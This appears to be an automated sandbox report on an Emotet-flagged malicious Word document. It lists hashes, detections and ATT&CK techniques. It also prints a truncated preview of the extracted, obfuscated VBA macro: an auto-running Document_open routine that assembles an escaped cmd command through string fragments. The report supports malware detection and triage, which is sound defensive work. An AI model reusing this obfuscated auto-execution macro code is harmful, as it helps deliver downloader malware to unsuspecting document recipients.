Emotet Office (OLE) malware analysis — malicious · 4b4f55aca8fa70dd

MALICIOUS

Office (OLE)

166.0 KB Created: 2018-07-16 01:58:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 3ebb5887d9b1d403fbe054b1a20550ee SHA-1: e4280f731dec943060a00b61a1738b6660e527db SHA-256: 4b4f55aca8fa70ddeea24ca24dff1be0a07f1f26741d852baa13134e7d7fe93c

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_open' macro, which is automatically executed, uses the Shell() function to run a command. This behavior is characteristic of Emotet, a known downloader family. The ClamAV detection further supports this classification. The VBA script's primary function appears to be executing a command, likely to download and run a second-stage payload.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7057690-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7057690-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30298 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	30298 bytes
SHA-256: `8eea49a5bbe7b5c9fcea306975c14fbfdffa6d201f6bb77f80d2f6f6eaf09f0e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vaCXZbAHEXf" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function qFDYiGliZO() qtVuo = (11400 + uMQjs - 59206 - aPvCL * 95619 - AoJJo) DjJdi = (95643 + SCzfc - 64179 - IuluiQ * 84764 - hvUovz) YJkBI = (45637 + VBGTjJ - 65448 - DFEMZ * 94832 - EwqSib) XVKcw = (24737 + KCZJUs - 65995 - BNYOwh * 92661 - hVZCO) AKpwR = (73171 + ailKC - 70559 - wjRpSS * 47525 - nDKlF) BMwrbK = (34710 + qvvbr - 18056 - YmwRS * 51810 - kWibz) jJWNiO = (49401 + qBwIn - 70172 - UmvhI * 56592 - NXtTqE) End Function Function FkwQFcv() liOZK = (9697 + zWzkK - 61768 - DoZZiW * 59115 - uXrfJ) UThrDw = (79269 + GVBZmh - 69602 - wBKSLC * 24116 - KWjkri) WNCiCT = (54375 + NNSDdw - 84719 - Kjsdw * 26605 - RGhjhN) MAlwE = (22292 + FiUqj - 62031 - cmDhY * 18731 - CVAcli) End Function Private Sub Document_open() On Error Resume Next vfRuOv = (39777 + iLodN - 37862 - FsckzN * 39398 - jniww) UpJYXc = (98251 + LbzlK - 22172 - EcDcM * 7017 - qzAWH) csEsuw = (39950 + HzFtp - 68985 - jPScDk * 64696 - iEzJR) GuqEinGMVm = Application.Run("ZZiQYFLYjj", "" + UccQvfq + wwurnjpDC + CVar("c") + tXWiaLlH + VuJKUAlDsaCjTB + CzZVzr + MmEkZnJ + FzKBMlPs + azbXqnWR + UNaBGwTJM + LLczwAlGnf + dAVpTTDG + vWQrjnZlih + ViZEMDdO + OikPECJUYfu + tsvvAaBRM + VTAitCo + ZtCWurNIfS) YLquY = (41005 + vmDLuu - 69223 - pAAjaQ * 6343 - qfzoMm) End Sub Function wBzIJoUhzHmW() wZFLq = (34138 + DIZJk - 98287 - YzbtU * 13288 - Wcrih) HIWUi = (90296 + sGzGQ - 54366 - KYtAXw * 1293 - ILjXw) UrjVwl = (46492 + FNwmmp - 3105 - AAMEI * 24956 - qcsow) znOcEZ = (82440 + GChutM - 48542 - bKrVom * 96413 - JPEzL) WjVjjc = (97884 + BFjLl - 43558 - VaRVw * 23225 - zNfHbp) wVzGM = (84803 + XBTfmz - 82003 - HrjUI * 26041 - XGMpL) cKRXI = (60017 + plVhzP - 53127 - cIlSZz * 85289 - SfMfwb) End Function Attribute VB_Name = "YBIWzJH" Function CzZVzr() On Error Resume Next sSqFd = 60264 + 59665 * qpUST - CFRiYl / aMOFk + sKrWI - oaWIQ + SMWjkR * 13496 - EVQLhw - 89806 + 45285 rIzpF = 84465 + 69136 * uuhKYw - jOrFns / cYzmB + zPPjUi - hNSpzW + zrXWZ * 73624 - MAXWc - 23919 + 40501 WfmEfXfw = CStr(Chr(UjPnTufIRfLz + EuQfmwN + 109 + mTJzaFvUD + qsUwjoJmfO)) + "d /" + CStr(Chr(JDtZMiZNVzNcUK + CVLHkmM + 99 + UzwmbrEfZz + jiqiBCtircWt)) + " F" + "^oR ," + " ; " + "/^f" + " ; " + CStr(Chr(KCwJWqhzsiba + IzuKzXW + 34 + dikThhrdEh + BjPcEzjqLDbI)) + " del" + "i" + CStr(Chr(uhLuhNXiVb + zRABWtCXGR + 109 + uXpwIaHciLnK + ziJTKoqj)) + "s" AtQmrw = 37001 + 23291 * fVfzB - GYfucz / rKXtjo + GQJQj - rCZih + FqOjp * 36972 - npVsW - 56754 + 59146 KpZcCzQqjO = "=nZa" + "4F" + "H to" + "kens= " + " +2" + " " + CStr(Chr(pKhhFQOcC + KXaauUJsndqjLu + 34 + nGqrNXZHz + WNzLHpKoGj)) + " ; " + "%n" dYpZbO = 42450 + 26233 * oSwZl - dDGXzP / OjdVOU + QdKSH - HKzzoD + diZKr * 2630 - vbazz - 29131 + 86776 PzSiz = 18804 + 27167 * OQkCE - ANLrHd / haWAWl + mnCOp - KhOlFj + XbCZll * 43354 - JRntYf - 64258 + 43812 CKLsslrC = " ; ; " + "^" + "IN ," + " " + "( ," CIwMZa = 41309 + 32852 * NtrRT - qoEVC / TivOUw + AWRDC - kNURzR + MOGWNF * 36454 - LpXQz - 73197 + 67090 FzBzrL = 15332 + 61873 * JTSGH - trGjHS / NBUoCL + sjzBA - pBamWR + ZrzdVT * 31059 - XmdBd - 54224 + 72732 ZFpjOhpzJT = " ; " + " ' , " + ", ^^f^" + "^TY" ABcCCC = 71670 + 19100 * HAEKRv - ZSsdiu / wOabfD + qsUEm - ScHdmb + QpOIu * 57244 - EijUL - 12647 + 48760 EiBRjw = 80930 + 80568 * jvVWE - YiEcY / PdAoj + nEKBoU - uncvf + jXkjY * 81631 - TLZHi - 94454 + 53507 surthDLLFNB = "pe ; " + " , ^\| " + ";" + " ^^Fi" + "nd " + "," + " " + CStr(Chr(UhoMlwaVn + bVLllmw + 34 + BumfqSiuAFR + qWKZLoIXXloKVp)) + CStr(Chr(ZCIQQOZ + VTQjUiQY + 109 + paMbKKFdJwU + mqbDIOicwQQ)) + "dFi" + CStr(Chr(srCDXlpKGd + wFKkQvoArdp + 34 + HKBCsKvkpRN + aifSfNO)) + " ;" + " ; '" + " , ; )" + " ; ; " CzZVzr = WfmEfXfw + KpZcCzQqjO + CKLsslrC + ZFpjOhpzJT ... (truncated)

SHA-256: 8eea49a5bbe7b5c9fcea306975c14fbfdffa6d201f6bb77f80d2f6f6eaf09f0e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vaCXZbAHEXf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function qFDYiGliZO()
   qtVuo = (11400 + uMQjs - 59206 - aPvCL * 95619 - AoJJo)
   DjJdi = (95643 + SCzfc - 64179 - IuluiQ * 84764 - hvUovz)
   YJkBI = (45637 + VBGTjJ - 65448 - DFEMZ * 94832 - EwqSib)
   XVKcw = (24737 + KCZJUs - 65995 - BNYOwh * 92661 - hVZCO)
   AKpwR = (73171 + ailKC - 70559 - wjRpSS * 47525 - nDKlF)
   BMwrbK = (34710 + qvvbr - 18056 - YmwRS * 51810 - kWibz)
   jJWNiO = (49401 + qBwIn - 70172 - UmvhI * 56592 - NXtTqE)
End Function
Function FkwQFcv()
   liOZK = (9697 + zWzkK - 61768 - DoZZiW * 59115 - uXrfJ)
   UThrDw = (79269 + GVBZmh - 69602 - wBKSLC * 24116 - KWjkri)
   WNCiCT = (54375 + NNSDdw - 84719 - Kjsdw * 26605 - RGhjhN)
   MAlwE = (22292 + FiUqj - 62031 - cmDhY * 18731 - CVAcli)
End Function
Private Sub Document_open()
On Error Resume Next
   vfRuOv = (39777 + iLodN - 37862 - FsckzN * 39398 - jniww)
   UpJYXc = (98251 + LbzlK - 22172 - EcDcM * 7017 - qzAWH)
   csEsuw = (39950 + HzFtp - 68985 - jPScDk * 64696 - iEzJR)
GuqEinGMVm = Application.Run("ZZiQYFLYjj", "" + UccQvfq + wwurnjpDC + CVar("c") + tXWiaLlH + VuJKUAlDsaCjTB + CzZVzr + MmEkZnJ + FzKBMlPs + azbXqnWR + UNaBGwTJM + LLczwAlGnf + dAVpTTDG + vWQrjnZlih + ViZEMDdO + OikPECJUYfu + tsvvAaBRM + VTAitCo + ZtCWurNIfS)
   YLquY = (41005 + vmDLuu - 69223 - pAAjaQ * 6343 - qfzoMm)
End Sub
Function wBzIJoUhzHmW()
   wZFLq = (34138 + DIZJk - 98287 - YzbtU * 13288 - Wcrih)
   HIWUi = (90296 + sGzGQ - 54366 - KYtAXw * 1293 - ILjXw)
   UrjVwl = (46492 + FNwmmp - 3105 - AAMEI * 24956 - qcsow)
   znOcEZ = (82440 + GChutM - 48542 - bKrVom * 96413 - JPEzL)
   WjVjjc = (97884 + BFjLl - 43558 - VaRVw * 23225 - zNfHbp)
   wVzGM = (84803 + XBTfmz - 82003 - HrjUI * 26041 - XGMpL)
   cKRXI = (60017 + plVhzP - 53127 - cIlSZz * 85289 - SfMfwb)
End Function


Attribute VB_Name = "YBIWzJH"
Function CzZVzr()
On Error Resume Next
sSqFd = 60264 + 59665 * qpUST - CFRiYl / aMOFk + sKrWI - oaWIQ + SMWjkR * 13496 - EVQLhw - 89806 + 45285
   rIzpF = 84465 + 69136 * uuhKYw - jOrFns / cYzmB + zPPjUi - hNSpzW + zrXWZ * 73624 - MAXWc - 23919 + 40501
WfmEfXfw = CStr(Chr(UjPnTufIRfLz + EuQfmwN + 109 + mTJzaFvUD + qsUwjoJmfO)) + "d /" + CStr(Chr(JDtZMiZNVzNcUK + CVLHkmM + 99 + UzwmbrEfZz + jiqiBCtircWt)) + " F" + "^oR  ," + "  ;  " + "/^f" + " ; " + CStr(Chr(KCwJWqhzsiba + IzuKzXW + 34 + dikThhrdEh + BjPcEzjqLDbI)) + "  del" + "i" + CStr(Chr(uhLuhNXiVb + zRABWtCXGR + 109 + uXpwIaHciLnK + ziJTKoqj)) + "s"
AtQmrw = 37001 + 23291 * fVfzB - GYfucz / rKXtjo + GQJQj - rCZih + FqOjp * 36972 - npVsW - 56754 + 59146
KpZcCzQqjO = "=nZa" + "4F" + "H to" + "kens= " + "  +2" + " " + CStr(Chr(pKhhFQOcC + KXaauUJsndqjLu + 34 + nGqrNXZHz + WNzLHpKoGj)) + " ;  " + "%n"
dYpZbO = 42450 + 26233 * oSwZl - dDGXzP / OjdVOU + QdKSH - HKzzoD + diZKr * 2630 - vbazz - 29131 + 86776
   PzSiz = 18804 + 27167 * OQkCE - ANLrHd / haWAWl + mnCOp - KhOlFj + XbCZll * 43354 - JRntYf - 64258 + 43812
CKLsslrC = " ; ; " + "^" + "IN ," + " " + "( ,"
CIwMZa = 41309 + 32852 * NtrRT - qoEVC / TivOUw + AWRDC - kNURzR + MOGWNF * 36454 - LpXQz - 73197 + 67090
   FzBzrL = 15332 + 61873 * JTSGH - trGjHS / NBUoCL + sjzBA - pBamWR + ZrzdVT * 31059 - XmdBd - 54224 + 72732
ZFpjOhpzJT = " ; " + " '  , " + ", ^^f^" + "^TY"
ABcCCC = 71670 + 19100 * HAEKRv - ZSsdiu / wOabfD + qsUEm - ScHdmb + QpOIu * 57244 - EijUL - 12647 + 48760
   EiBRjw = 80930 + 80568 * jvVWE - YiEcY / PdAoj + nEKBoU - uncvf + jXkjY * 81631 - TLZHi - 94454 + 53507
surthDLLFNB = "pe ; " + " , ^| " + ";" + " ^^Fi" + "nd " + "," + " " + CStr(Chr(UhoMlwaVn + bVLllmw + 34 + BumfqSiuAFR + qWKZLoIXXloKVp)) + CStr(Chr(ZCIQQOZ + VTQjUiQY + 109 + paMbKKFdJwU + mqbDIOicwQQ)) + "dFi" + CStr(Chr(srCDXlpKGd + wFKkQvoArdp + 34 + HKBCsKvkpRN + aifSfNO)) + " ;" + " ; '" + " , ; )" + "  ; ; "
CzZVzr = WfmEfXfw + KpZcCzQqjO + CKLsslrC + ZFpjOhpzJT
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.